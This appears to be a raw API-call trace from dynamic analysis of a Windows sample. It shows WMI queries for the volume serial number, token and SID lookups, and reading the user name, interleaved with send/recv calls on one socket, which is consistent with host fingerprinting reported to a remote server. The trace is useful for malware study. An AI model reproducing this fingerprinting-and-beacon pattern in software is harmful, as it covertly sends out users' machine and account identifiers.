	[0258.669] CoGetClassObject (in: rclsid=0x38bb74*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae3d8 | out: ppv=0x5eae3d8*=0x626cb70) returned 0x0
	[0258.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x626cb70, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae208 | out: ppvObject=0x5eae208*=0x0) returned 0x80004002
	[0258.669] WbemDefPath:IClassFactory:CreateInstance (in: This=0x626cb70, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae240 | out: ppvObject=0x5eae240*=0x626e0a0) returned 0x0
	[0258.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e0a0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadfe4 | out: ppvObject=0x5eadfe4*=0x626e0a0) returned 0x0
	[0258.670] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e0a0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadfa0 | out: ppvObject=0x5eadfa0*=0x0) returned 0x80004002
	[0258.670] WbemDefPath:IUnknown:AddRef (This=0x626e0a0) returned 0x3
	[0258.670] CoGetContextToken (in: pToken=0x5eade2c | out: pToken=0x5eade2c) returned 0x0
	[0258.670] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e0a0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade14 | out: ppvObject=0x5eade14*=0x39b7e8) returned 0x0
	[0258.670] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x39b7e8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eade1c | out: pCid=0x5eade1c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.670] WbemDefPath:IUnknown:Release (This=0x39b7e8) returned 0x3
	[0258.671] CoGetContextToken (in: pToken=0x5eade24 | out: pToken=0x5eade24) returned 0x0
	[0258.671] WbemDefPath:IUnknown:AddRef (This=0x626e0a0) returned 0x4
	[0258.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e0a0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade98 | out: ppvObject=0x5eade98*=0x0) returned 0x80004002
	[0258.671] WbemDefPath:IUnknown:Release (This=0x626e0a0) returned 0x3
	[0258.671] WbemDefPath:IUnknown:Release (This=0x626e0a0) returned 0x2
	[0258.671] WbemDefPath:IUnknown:Release (This=0x626cb70) returned 0x0
	[0258.671] WbemDefPath:IUnknown:Release (This=0x626e0a0) returned 0x1
	[0258.671] CoGetContextToken (in: pToken=0x5eae6d4 | out: pToken=0x5eae6d4) returned 0x0
	[0258.671] CoGetContextToken (in: pToken=0x5eae694 | out: pToken=0x5eae694) returned 0x0
	[0258.671] WbemDefPath:IUnknown:AddRef (This=0x626e0a0) returned 0x2
	[0258.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e0a0, riid=0x5eae710*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae70c | out: ppvObject=0x5eae70c*=0x626e0a0) returned 0x0
	[0258.672] WbemDefPath:IUnknown:Release (This=0x626e0a0) returned 0x2
	[0258.672] WbemDefPath:IUnknown:Release (This=0x626e0a0) returned 0x1
	[0258.672] CoGetContextToken (in: pToken=0x5eae754 | out: pToken=0x5eae754) returned 0x0
	[0258.672] CoGetContextToken (in: pToken=0x5eae714 | out: pToken=0x5eae714) returned 0x0
	[0258.672] WbemDefPath:IUnknown:AddRef (This=0x626e0a0) returned 0x2
	[0258.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e0a0, riid=0x5eae790*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae78c | out: ppvObject=0x5eae78c*=0x626e0a0) returned 0x0
	[0258.672] WbemDefPath:IUnknown:Release (This=0x626e0a0) returned 0x2
	[0258.672] WbemDefPath:IUnknown:AddRef (This=0x626e0a0) returned 0x3
	[0258.672] WbemDefPath:IWbemPath:SetText (This=0x626e0a0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x0
	[0258.672] WbemDefPath:IUnknown:Release (This=0x626e0a0) returned 0x2
	[0258.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626d3d8, puCount=0x5eae8f4 | out: puCount=0x5eae8f4*=0x2) returned 0x0
	[0258.673] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae8f0*=0x0, pszText=0x0 | out: puBuffLength=0x5eae8f0*=0x17, pszText=0x0) returned 0x0
	[0258.673] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.673] CoGetContextToken (in: pToken=0x5eae67c | out: pToken=0x5eae67c) returned 0x0
	[0258.673] IUnknown:AddRef (This=0x626decc) returned 0x3
	[0258.673] IEnumWbemClassObject:Next (in: This=0x626decc, lTimeout=-1, uCount=0x1, apObjects=0x38ef70, puReturned=0x2fb1c30 | out: apObjects=0x38ef70*=0x0, puReturned=0x2fb1c30*=0x0) returned 0x1
	[0258.691] IUnknown:Release (This=0x626decc) returned 0x2
	[0258.691] CoGetContextToken (in: pToken=0x5eae7c4 | out: pToken=0x5eae7c4) returned 0x0
	[0258.691] WbemLocator:IUnknown:Release (This=0x3b336c) returned 0x1
	[0258.691] IUnknown:Release (This=0x626decc) returned 0x0
	[0258.703] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626d3d8, puCount=0x5eae968 | out: puCount=0x5eae968*=0x2) returned 0x0
	[0258.703] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae964*=0x0, pszText=0x0 | out: puBuffLength=0x5eae964*=0x17, pszText=0x0) returned 0x0
	[0258.703] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae964*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae964*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.703] IWbemClassObject:Get (in: This=0x626df08, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae924*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb30e4*=0, plFlavor=0x2fb30e8*=0 | out: pVal=0x5eae924*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2fb30e4*=8, plFlavor=0x2fb30e8*=64) returned 0x0
	[0258.703] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0258.704] IWbemClassObject:Get (in: This=0x626df08, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb30e4*=8, plFlavor=0x2fb30e8*=64 | out: pVal=0x5eae928*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2fb30e4*=8, plFlavor=0x2fb30e8*=64) returned 0x0
	[0258.704] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0258.704] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626d3d8, puCount=0x5eae968 | out: puCount=0x5eae968*=0x2) returned 0x0
	[0258.704] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae964*=0x0, pszText=0x0 | out: puBuffLength=0x5eae964*=0x17, pszText=0x0) returned 0x0
	[0258.704] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae964*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae964*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.704] IWbemClassObject:Get (in: This=0x626df08, wszName="__CLASS", lFlags=0, pVal=0x5eae924*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb319c*=0, plFlavor=0x2fb31a0*=0 | out: pVal=0x5eae924*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2fb319c*=8, plFlavor=0x2fb31a0*=64) returned 0x0
	[0258.704] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0258.704] IWbemClassObject:Get (in: This=0x626df08, wszName="__CLASS", lFlags=0, pVal=0x5eae928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb319c*=8, plFlavor=0x2fb31a0*=64 | out: pVal=0x5eae928*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2fb319c*=8, plFlavor=0x2fb31a0*=64) returned 0x0
	[0258.704] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0258.704] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626d3d8, puCount=0x5eae958 | out: puCount=0x5eae958*=0x2) returned 0x0
	[0258.704] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae954*=0x0, pszText=0x0 | out: puBuffLength=0x5eae954*=0x17, pszText=0x0) returned 0x0
	[0258.704] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae954*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae954*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.704] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626d3d8, puCount=0x5eae958 | out: puCount=0x5eae958*=0x2) returned 0x0
	[0258.704] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae954*=0x0, pszText=0x0 | out: puBuffLength=0x5eae954*=0x17, pszText=0x0) returned 0x0
	[0258.704] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae954*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae954*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.705] IWbemClassObject:GetNames (in: This=0x626df08, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5eae91c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5eae8e8 | out: pNames=0x5eae8e8*="\x01ƀ\x04") returned 0x0
	[0258.705] SafeArrayGetDim (psa=0x3acdf0) returned 0x1
	[0258.705] SafeArrayGetDim (psa=0x3acdf0) returned 0x1
	[0258.705] SafeArrayGetLBound (in: psa=0x3acdf0, nDim=0x1, plLbound=0x5eae4e4 | out: plLbound=0x5eae4e4) returned 0x0
	[0258.705] IWbemClassObject:Get (in: This=0x626df08, wszName="__GENUS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb3a34*=0, plFlavor=0x2fb3a38*=0 | out: pVal=0x5eae914*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x2fb3a34*=3, plFlavor=0x2fb3a38*=64) returned 0x0
	[0258.706] IWbemClassObject:Get (in: This=0x626df08, wszName="__CLASS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb3a68*=0, plFlavor=0x2fb3a6c*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2fb3a68*=8, plFlavor=0x2fb3a6c*=64) returned 0x0
	[0258.706] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0258.706] IWbemClassObject:Get (in: This=0x626df08, wszName="__SUPERCLASS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb3abc*=0, plFlavor=0x2fb3ac0*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_StorageVolume", varVal2=0x0), pType=0x2fb3abc*=8, plFlavor=0x2fb3ac0*=64) returned 0x0
	[0258.706] SysStringLen (param_1="CIM_StorageVolume") returned 0x11
	[0258.706] IWbemClassObject:Get (in: This=0x626df08, wszName="__DYNASTY", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb3b18*=0, plFlavor=0x2fb3b1c*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x2fb3b18*=8, plFlavor=0x2fb3b1c*=64) returned 0x0
	[0258.706] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0258.706] IWbemClassObject:Get (in: This=0x626df08, wszName="__RELPATH", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb3b84*=0, plFlavor=0x2fb3b88*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x2fb3b84*=8, plFlavor=0x2fb3b88*=64) returned 0x0
	[0258.706] SysStringLen (param_1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x4d
	[0258.706] IWbemClassObject:Get (in: This=0x626df08, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb3c58*=0, plFlavor=0x2fb3c5c*=0 | out: pVal=0x5eae914*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), pType=0x2fb3c58*=3, plFlavor=0x2fb3c5c*=64) returned 0x0
	[0258.706] IWbemClassObject:Get (in: This=0x626df08, wszName="__DERIVATION", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb3c8c*=0, plFlavor=0x2fb3c90*=0 | out: pVal=0x5eae914*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3acdf0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x3b8c88, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x2fb3c8c*=8200, plFlavor=0x2fb3c90*=64) returned 0x0
	[0258.707] IWbemClassObject:Get (in: This=0x626df08, wszName="__SERVER", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb3df0*=0, plFlavor=0x2fb3df4*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x2fb3df0*=8, plFlavor=0x2fb3df4*=64) returned 0x0
	[0258.707] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0258.707] IWbemClassObject:Get (in: This=0x626df08, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb3e3c*=0, plFlavor=0x2fb3e40*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2fb3e3c*=8, plFlavor=0x2fb3e40*=64) returned 0x0
	[0258.707] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0258.707] IWbemClassObject:Get (in: This=0x626df08, wszName="__PATH", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb3e8c*=0, plFlavor=0x2fb3e90*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x2fb3e8c*=8, plFlavor=0x2fb3e90*=64) returned 0x0
	[0258.707] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0258.707] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626d3d8, puCount=0x5eae994 | out: puCount=0x5eae994*=0x2) returned 0x0
	[0258.707] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae990*=0x0, pszText=0x0 | out: puBuffLength=0x5eae990*=0x17, pszText=0x0) returned 0x0
	[0258.708] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae990*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae990*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.708] IWbemClassObject:Get (in: This=0x626df08, wszName="SerialNumber", lFlags=0, pVal=0x5eae950*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb3fe0*=0, plFlavor=0x2fb3fe4*=0 | out: pVal=0x5eae950*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x2fb3fe0*=19, plFlavor=0x2fb3fe4*=0) returned 0x0
	[0258.708] IWbemClassObject:Get (in: This=0x626df08, wszName="SerialNumber", lFlags=0, pVal=0x5eaea08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fb3fe0*=19, plFlavor=0x2fb3fe4*=0 | out: pVal=0x5eaea08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x2fb3fe0*=19, plFlavor=0x2fb3fe4*=0) returned 0x0
	[0258.737] send (s=0x420, buf=0x2fb4ba4*, len=36, flags=0) returned 36
	[0258.737] GetLastError () returned 0x0
	[0258.737] recv (in: s=0x420, buf=0x2fa0ffc, len=502, flags=0 | out: buf=0x2fa0ffc*) returned 88
	[0259.212] GetLastError () returned 0x0
	[0259.221] VirtualQuery (in: lpAddress=0x5eadd68, lpBuffer=0x5eaed68, dwLength=0x1c | out: lpBuffer=0x5eaed68*(BaseAddress=0x5ead000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0259.222] send (s=0x420, buf=0x2fc00dc*, len=34, flags=0) returned 34
	[0259.222] GetLastError () returned 0x0
	[0259.222] recv (in: s=0x420, buf=0x2fa0ffc, len=502, flags=0 | out: buf=0x2fa0ffc*) returned 121
	[0260.225] GetLastError () returned 0x0
	[0260.227] VirtualQuery (in: lpAddress=0x5eadd68, lpBuffer=0x5eaed68, dwLength=0x1c | out: lpBuffer=0x5eaed68*(BaseAddress=0x5ead000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0260.228] GetCurrentProcess () returned 0xffffffff
	[0260.228] GetLastError () returned 0x3f0
	[0260.228] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae954 | out: TokenHandle=0x5eae954*=0x4cc) returned 1
	[0260.228] GetLastError () returned 0x3f0
	[0260.228] GetCurrentProcess () returned 0xffffffff
	[0260.228] GetLastError () returned 0x3f0
	[0260.228] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae99c | out: TokenHandle=0x5eae99c*=0x4c8) returned 1
	[0260.229] GetLastError () returned 0x3f0
	[0260.229] GetTokenInformation (in: TokenHandle=0x4cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x5eaea44 | out: TokenInformation=0x0, ReturnLength=0x5eaea44) returned 0
	[0260.229] GetLastError () returned 0x7a
	[0260.229] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x3ace40
	[0260.229] GetLastError () returned 0x7a
	[0260.229] GetTokenInformation (in: TokenHandle=0x4cc, TokenInformationClass=0x1, TokenInformation=0x3ace40, TokenInformationLength=0x24, ReturnLength=0x5eaea44 | out: TokenInformation=0x3ace40, ReturnLength=0x5eaea44) returned 1
	[0260.229] GetLastError () returned 0x7a
	[0260.230] LocalFree (hMem=0x3ace40) returned 0x0
	[0260.230] GetLastError () returned 0x7a
	[0260.230] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x5eae910, DesiredAccess=0x800, PolicyHandle=0x5eae8b8 | out: PolicyHandle=0x5eae8b8) returned 0x0
	[0260.360] GetLastError () returned 0x0
	[0260.361] LsaLookupSids (in: PolicyHandle=0x3b8c88, Count=0x1, Sids=0x2fcacec*=0x2fcac8c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x5eae8e0, Names=0x5eae8d4 | out: ReferencedDomains=0x5eae8e0, Names=0x5eae8d4) returned 0x0
	[0260.361] GetLastError () returned 0x0
	[0260.361] LsaClose (ObjectHandle=0x3b8c88) returned 0x0
	[0260.362] GetLastError () returned 0x0
	[0260.362] LsaFreeMemory (Buffer=0x387390) returned 0x0
	[0260.362] GetLastError () returned 0x0
	[0260.362] LsaFreeMemory (Buffer=0x3b1528) returned 0x0
	[0260.362] GetLastError () returned 0x0
	[0260.362] send (s=0x420, buf=0x2fcb428*, len=49, flags=0) returned 49
	[0260.364] GetLastError () returned 0x0
	[0260.364] recv (in: s=0x420, buf=0x2fa0ffc, len=502, flags=0 | out: buf=0x2fa0ffc*) returned 91
	[0261.196] GetLastError () returned 0x0
	[0261.197] VirtualQuery (in: lpAddress=0x5eadd68, lpBuffer=0x5eaed68, dwLength=0x1c | out: lpBuffer=0x5eaed68*(BaseAddress=0x5ead000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0261.200] GetUserNameW (in: lpBuffer=0x390a68, pcbBuffer=0x5eaea90 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x5eaea90) returned 1
	[0261.202] send (s=0x420, buf=0x2fd5db0*, len=43, flags=0) returned 43
	[0261.203] GetLastError () returned 0x0
	[0261.203] recv (in: s=0x420, buf=0x2fa0ffc, len=502, flags=0 | out: buf=0x2fa0ffc*) returned 108
	[0262.215] GetLastError () returned 0x0
	[0262.217] VirtualQuery (in: lpAddress=0x5eadd68, lpBuffer=0x5eaed68, dwLength=0x1c | out: lpBuffer=0x5eaed68*(BaseAddress=0x5ead000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0262.227] CoGetObjectContext (in: riid=0x2b3adb0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae8dc | out: ppv=0x5eae8dc*=0x2d8dec) returned 0x0
	[0262.228] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae8d4 | out: pAptType=0x5eae8d4*=1) returned 0x0
	[0262.228] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2b3ad98*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae8d8 | out: ppvObject=0x5eae8d8*=0x0) returned 0x80004002
	[0262.228] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0262.228] CoGetClassObject (in: rclsid=0x38bb74*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae3f4 | out: ppv=0x5eae3f4*=0x626cb70) returned 0x0
	[0262.228] WbemDefPath:IUnknown:QueryInterface (in: This=0x626cb70, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae224 | out: ppvObject=0x5eae224*=0x0) returned 0x80004002
	[0262.229] WbemDefPath:IClassFactory:CreateInstance (in: This=0x626cb70, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae25c | out: ppvObject=0x5eae25c*=0x626de40) returned 0x0
	[0262.229] WbemDefPath:IUnknown:QueryInterface (in: This=0x626de40, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae000 | out: ppvObject=0x5eae000*=0x626de40) returned 0x0
	[0262.229] WbemDefPath:IUnknown:QueryInterface (in: This=0x626de40, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadfbc | out: ppvObject=0x5eadfbc*=0x0) returned 0x80004002
	[0262.229] WbemDefPath:IUnknown:AddRef (This=0x626de40) returned 0x3
